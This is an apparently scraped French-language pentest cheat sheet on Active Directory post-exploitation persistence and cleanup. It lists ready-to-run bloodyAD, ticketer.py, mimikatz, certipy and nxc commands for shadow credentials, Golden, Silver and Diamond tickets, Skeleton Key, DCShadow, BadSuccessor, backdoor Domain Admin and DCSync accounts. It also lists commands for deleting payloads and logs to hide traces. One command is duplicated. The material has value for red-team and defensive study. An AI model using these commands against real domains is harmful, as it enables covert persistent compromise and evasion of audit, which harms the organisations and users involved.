bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add shadowCredentials '$TARGET_USER'Description: Shadow credentials : persistance discrète sur un compte, survit aux resets de mot de passe.
Post-Exploitation
Persistance discrète et nettoyage OPSEC après compromission du domaine.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add shadowCredentials '$TARGET_USER'Description: Shadow credentials : persistance discrète sur un compte, survit aux resets de mot de passe.
ticketer.py -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN AdministratorDescription: Golden Ticket : persistance maximale, valide 10 ans par défaut si krbtgt n'est pas changé.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add member 'Domain Admins' '$BACKDOOR_USER'Description: Ajouter un compte backdoor aux Domain Admins : simple mais détectable par monitoring.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add dcsync '$BACKDOOR_USER'Description: Donner les droits DCSync à un compte discret : backdoor qui ne requiert pas DA.
ticketer.py -nthash $SERVICE_NTHASH -domain-sid $DOMAIN_SID -domain $DOMAIN -spn cifs/$TARGET $USERDescription: Silver Ticket : forge un TGS pour un service précis (cifs, http, mssql...) avec le hash du compte de service, sans jamais toucher le DC.
ticketer.py -nthash $KRBTGT_HASH -aesKey $KRBTGT_AES -domain-sid $DOMAIN_SID -domain $DOMAIN -extra-pac -user-id 500 AdministratorDescription: Diamond Ticket : modifie un TGT légitime intercepté plutôt que d'en forger un de zéro, plus discret face à la détection Golden Ticket classique (attributs cohérents avec un vrai TGT).
mimikatz # privilege::debug; misc::skeletonDescription: Skeleton Key : patch LSASS sur le DC pour accepter un mot de passe universel en plus du vrai, pour tous les comptes du domaine. Ne survit pas à un reboot, à réinjecter si besoin.
mimikatz # lsadump::dcshadow /object:$TARGET_USER /attribute:primaryGroupID /value:512Description: DCShadow : enregistre temporairement l'hôte courant comme DC légitime (via RPC de réplication) pour pousser une modification qui contourne les ACL classiques et échappe aux logs d'audit AD standards.
BadSuccessor.ps1 -Mode Exploit -DomainController $DC -Forest $DOMAIN -Credential $CRED -dMSA $DMSA_NAME -Target AdministratorDescription: BadSuccessor (Windows Server 2025) : avec CreateChild sur une OU, créer un dMSA et forcer son attribut msDS-ManagedAccountPrecededByLink vers un compte cible fait hériter ses privilèges au premier Kerberos auth du dMSA, sans toucher au compte cible lui-même.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS remove member '$GROUP' '$ATTACKER_USER'Description: Se retirer des groupes sensibles après exploitation : réduire les traces évidentes.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS remove shadowCredentials '$TARGET_USER' --key-guid $GUIDDescription: Supprimer les shadow credentials injectés après avoir obtenu l'accès voulu.
nxc smb $TARGET -u $USER -p $PASS -x 'del C:\Temp\payload.exe && del C:\Temp\*.log'Description: Supprimer les artefacts locaux : payloads, logs temporaires et autres fichiers.
certipy template -u '$USER@$DOMAIN' -p $PASS -template $TEMPLATE -configuration $TEMPLATE_OLDDescription: Restaurer un template ADCS modifié après exploitation ESC4 : remettre l'état initial.